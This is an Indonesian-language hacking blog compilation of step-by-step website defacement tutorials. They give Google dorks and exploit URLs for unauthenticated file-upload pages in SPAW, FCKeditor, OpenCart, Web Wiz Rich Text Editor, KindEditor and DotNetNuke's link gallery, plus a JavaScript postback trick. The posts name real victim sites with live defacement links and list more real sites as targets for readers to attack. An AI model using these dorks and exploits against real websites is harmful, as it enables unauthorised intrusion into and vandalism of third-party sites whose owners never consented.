Deface dengan Spaw Upload Manager Vulnerability

Hmmm,Akyra lagi suntuk nih,,, ada yg mau nemenin ? :D :plakk hehehe,kali ini akyra mau bagi2 trik deface web dengan memanfaatkan spaw manager vulnerability oke langsung ke tutorialnya, siapin camilan biar gak suntuk kayak ane ,lagu-lagu pembangkit hawa semangat(ane saranin lagunya Avenged Sevenfold) dan secangkir es kopi :D hahaha langsung aja dah, pertama sobat harus lakukan adalah membuat HTML/TXT(terserah sobat), lalu mencari korban,gimana caranya??? gampanggg tulis aja dorknya di gugel : inurl:/spaw2/uploads/files/ udah nemu korban?langsung aja kasih exploitnya /spaw2/dialogs/dialog.php? module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494d a752d98cac9&type=file taruh exploit itu di belakang url web yang akan kita deface contohnya target : > http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/uploads/files/ maka jika di tambah exploitnya menjadi : > http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/dialogs/dialog.php? module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494d a752d98cac9&type=file nah,ntar sobat akan masuk ke suatu halaman yg namanya SPAW Manager,di situlah sobat akan meng upload file HTML sobat pas di SPAW Manager tersebut sobat ganti dari "Images" menjadi "Files" lalu sobat masukkan file HTML sobat di sana dengan cara klik browse>pilih file HTML/TXT/terserah sobat>uploads tunggu sampai proses peng upload'an nya selesai jika sudah selesai sobat bisa melihat hasil deface sobat dg url http://www.target.com/spaw2/uploads/files/nama_html_sobat.html ( kalau yg sobat upload adalah file html,kalo txt ya tinggal ganti .html menjadi .txt) atau dengan cara klik download file yang ada di sebelah kanan liat aja punya saya :D http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/uploads/files/Defaced.txt ___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com

Deface dengan Memanfaatkan FCKeditor Vulnerability

Dorknya:coba2 aja... - inurl:/editor/editor/filemanager/ - inurl:/HTMLEditor/editor/" - inurl:/HTMLEditor/editor//filemanager/ - inurl:/HTMLEditor/editor/filemanager/connectors/ Exploit:http://[target.com]/editor/editor/filemanager/upload/test.html http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html dork diatas ^ isi kan d google, cari target...kalo dapat ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/ inject kan exploit ny d atas.... jadinya....... ex : http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html pada [Select the "File Uploader" to use: ] <----- pilih PHP terus upload html kmu..... klik send it to server, kalo sukses or terupload maka pada kotak [Uploaded File URL:] akan memberikan patch dimana file kamu terupload ex : yang keluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html maka hasil nya ada di http://[target.com]/editor/html_kamu.html mudah kn....hehehehehe nih,hasil pepes ane :D http://www.centerkennedy.com.br/editor/images/anon_knight.html sumber : Hacker Indonesia

___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com

Deface dengan memanfaatkan FCK EDITOR "Powered By Opencart"

dork : Powered By OpenCart site:.com "site:" terserah, yang penting support opencart ex target: http://www.superbikecarbonparts.com/ bisa juga dgn trget http://www.target.com/pacth/ itu kalo dpt target yg ad di /patch/ nyaex: http://www.target.com/patch/ nah kalo dah dapat target, langsung aja kita inject exploitnya for exploit : Quote: admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html jdi nya gni ex: http://www.superbikecarbonparts.com/admi.../test.html kalo target yang ad /patch/ , inject nya d belakang patch nya ex: http://www.target.com/patch/admin/view/j.../test.html liat yg kluar, dstu trdpat tmpat upload file nya..... connector pilih PHP lngsung aja kita upload file html deface kita... jika berhasil mka akan kluar alert sprti ini Code: "file uploaded with no errors" liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files" skrng liat hasilnya.... ex hasil: http://www.superbikecarbonparts.com/k4ton.html buat belajar pake ini http://www.superbikecarbonparts.com/ sumber : Surabaya Hacker Team ___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com

Deface dengan Memanfaatkan kelemahan Web Rich Text Editor

kali ini ada Trik deface nih, wkwkwk ane nemu di binushacker gak apa apalah sesama Lamer harus saling berbagi :) oke langsung ke topik acara, udah siap mental kan mau deface web? wkowkowko pertama-tama siapin dulu File Script HTML kalo yang belom punya ya buat ato gak beli sama saya :p terus cari target yang bisa di deface , nyarinya pake Dork biar lebih enak , ini dorknya, tinggal ketik di kotak pencari Google terus Enter ! wkwk :p pake Dork salah 1 aja nih yang dibawah ! Dork: intitle:Powered by Web Wiz Rich Text Editor inurl:/my_documents/my_files/ inurl:RTE_popup_file_atch.asp terus kalo udah nyari Target , ambil 1 aja dulu terus tambahin exploit di belakang URL, nih ane kasih exploitnya : Exploit: path/RTE_popup_file_atch.asp cara pake-nya misal > http://web-targetmu.com/[path]/Exploitnya yaudah yok lanjut aja , nih pake Target Live aja biar Lo gak pening wkkwkwkk :* nih contoh web yang bisa di deface , silahkan di perkosa sendiri :p http://www.ullerslev-gaf.dk/admin/RTE_popup_file_atch.asp terus kalo udah masuk tuh, tinggak klik > Browse > Upload kalo udah berhasil tuh klik file mu tadi :D nah kalo upload berhasil, klik File HTMLmu tadi terus ambil URL file mu yang di kotak itu contoh nih : my_documents/my_files/289_indonesia.html << ambil terus ganti Exploit yang tadi dengan File HTMLmu contoh : http://www.ullerslev-gaf.dk/admin/RTE_popup_file_atch.asp ganti Exploit berikut dengan URL File HTMLmu , http://www.ullerslev-gaf.dk/admin/my_documents/my_files/289_indonesia.html udah bisa kan ? wkwkwk nih contoh Live Deface punya gue : http://www.ullerslev-gaf.dk/admin/my_documents/my_files/22E_LampungC0der.html http://www.ullerslev-gaf.dk/admin/my_documents/my_files/289_indonesia.html wkwkwk maklum jelek, bukan hasil deface saya :p enak kan cara Deface Website Wiz Rich Text Editor , gak tau artinya apaan yang penting upload-upload aja :D kalo mau di Upload Shell kayanya gak bisa deh, tapi ya gak tau deng, wkowkoko yaudah sebagai tambahan, nih gue kasih Target buat diperkosa rame-rame :* sapa tau ada yang masih Vuln : ___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com

http://lakeguntersville.org/RTE_popup_file_atch.asp http://solonschools.org/portal/webquest/RTE_popup_file_atch.asp http://adventureandspirit.com/ RTE_popup_file_atch.asp http://admin.healthyudelmarva.org/RTE_popup_file_atch.asp http://adnormous.com/RTE_popup_file_atch.asp http://acbathai.org/admin/RTE_popup_file_atch.asp http://lksd.org/wow/aoody/RTE_popup_file_atch.asp http://tasar.org.uk/startpage/RTE_popup_file_atch.asp http://seacoastredondo.com/admin/RTE_popup_file_atch.asp http://plymouth-chamber.co.uk/RTE_popup_file_atch.asp http://pgathailand.com/scripts/RTE_popup_file_atch.asp http://loor.ir/sysop/RTE_popup_file_atch.asp http://jrf.org.tw/newjrf/RTE_popup_file_atch.asp http://rutc.ac.uk/corpnew/webwiz/RTE_popup_file_atch.asp oke udah kan ? selamat bersenang-senang wkwkwk jangan lupa hasil show off di archieve buat koleksi :* yowes muuah, ditunggu komennya

___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com

Deface dengan Memanfaatkan Uploads Button Vulnerability

jomblo itu gak enak rek,,, tapi bagi jomblo yang maniak ama komputer trus pengen seru-seruan gini aja deh,akyra mau bagi bagi hasil belajar akyra ke sobat sobat nih,mau??hanya di 3 (:D) oke,langsung ke tutorialnya dah :D 1. guling-guling ke google dan search dorknya: DORK: inurl:examples/uploadbutton.html 2. Pilih situs yang terdapat di google itu, Contoh: http://modelku.com/Public/Js/kindeditor/...utton.html 3. Terlihat ada Upload Button kan.? nah klik aja terus Upload HTML agan yang udah ada. Tunggu beberapa detik maka ada url dalam table Upload Button tersebut, Contoh: Code: /Public/Js/kindeditor/attached/file/20120706/20120706211536_25277.html 4. Lalu COPAS url tersebut setelah alamat situs korban, maka jadinya serperti contoh di bawah ini: Quote: modelku.com/Public/Js/kindeditor/attached/file/20120706/20120706211536_25277.html 5. Klik enter deh, maka the site has been defaced by me or you.. hehehe... harap jangan di salah gunakan ya... ^_^ sumber : surabaya hacker

___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com

Deface dengan Memanfaatkan kelemahan FCKgallery

Trik Ini Boleh Dikatakan Trik Jaman Kodok, Jaman Lawas Rek.. Lumayan Buat Coba" Buat Yang Belom Tau, Yang Pasti Jangan Perna Lelah Mencari Target ??~_^ 1) Siapkan file deface kamu Cth --> http://www.anphucinvestment.vn/Portals/0/awaw.txt 2) Cari dork di Uncle Google.com --> inurl:/portals/0? 3) Cth target --> http://www.target.com/Portals/0/... 4) Potong setengah link target seperti ini http://www.target.com/ 5) Tambahkan ini di URL--> /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx Cth --> http://www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 6) Tandakan pada >> File ( A File On Your Site ) 7) Kemudian hapuskan link URL --> http://www.target.com/Providers/..gallery.aspx 8) Masukkan JavaScript ini pada link yg dihapus tadi atau kalo pake browser firefox masuk pada mode console -->javascript:__doPostBack('ctlURL$cmdUpload','') tekan ENTER! 9) Lalu upload file yg dibuat tadi rujuk pada langkah > Target awaw.txt --> http://www.anphucinvestment.vn/Portals/0/awaw.txt sekian dulu. *maaf kalo bahasanya campuran dengan bahasa malaysia m(_ _)m Sumber : om Dot Net Nuke

___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com